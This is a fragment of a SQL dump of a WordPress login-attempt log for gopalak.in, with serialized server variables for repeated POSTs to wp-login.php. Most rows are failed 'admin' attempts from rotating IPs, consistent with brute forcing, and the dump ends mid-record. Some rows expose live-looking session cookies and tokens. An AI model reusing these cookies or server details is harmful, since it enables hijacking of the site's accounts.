ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745694012.1671791;s:12:\"REQUEST_TIME\";i:1745694012;}}','186.64.116.45',0,'2025-04-27 00:30:14','1970-01-01 00:00:00'),(94361,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43792\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745694464.884192;s:12:\"REQUEST_TIME\";i:1745694464;}}','49.12.169.164',0,'2025-04-27 00:37:46','1970-01-01 00:00:00'),(94362,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40670\";s:11:\"REMOTE_ADDR\";s:15:\"133.242.131.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745694910.6350019;s:12:\"REQUEST_TIME\";i:1745694910;}}','133.242.131.226',0,'2025-04-27 00:45:12','1970-01-01 00:00:00'),(94363,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38742\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.123.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745695358.532495;s:12:\"REQUEST_TIME\";i:1745695358;}}','68.65.123.234',0,'2025-04-27 00:52:40','1970-01-01 00:00:00'),(94364,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52222\";s:11:\"REMOTE_ADDR\";s:15:\"114.119.174.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745695801.3004529;s:12:\"REQUEST_TIME\";i:1745695801;}}','114.119.174.226',0,'2025-04-27 01:00:03','1970-01-01 00:00:00'),(94365,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55792\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.132.42\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745696248.1448801;s:12:\"REQUEST_TIME\";i:1745696248;}}','66.29.132.42',0,'2025-04-27 01:07:29','1970-01-01 00:00:00'),(94366,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"8902\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745696693.7755489;s:12:\"REQUEST_TIME\";i:1745696693;}}','91.151.95.70',0,'2025-04-27 01:14:55','1970-01-01 00:00:00'),(94367,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33964\";s:11:\"REMOTE_ADDR\";s:13:\"190.92.174.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745697137.8594971;s:12:\"REQUEST_TIME\";i:1745697137;}}','190.92.174.31',0,'2025-04-27 01:22:19','1970-01-01 00:00:00'),(94368,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36148\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.145\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745697576.5426271;s:12:\"REQUEST_TIME\";i:1745697576;}}','199.188.200.145',0,'2025-04-27 01:29:38','1970-01-01 00:00:00'),(94369,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:254:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721155.8894961;s:12:\"REQUEST_TIME\";i:1745721155;}}','151.80.139.240',1,'2025-04-27 08:02:37','2025-04-27 08:12:44'),(94370,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7QY5FUlRZ\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745721157.6865399;s:12:\"REQUEST_TIME\";i:1745721157;}}','151.80.139.240',1,'2025-04-27 08:02:39','2025-04-27 08:12:44'),(94371,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 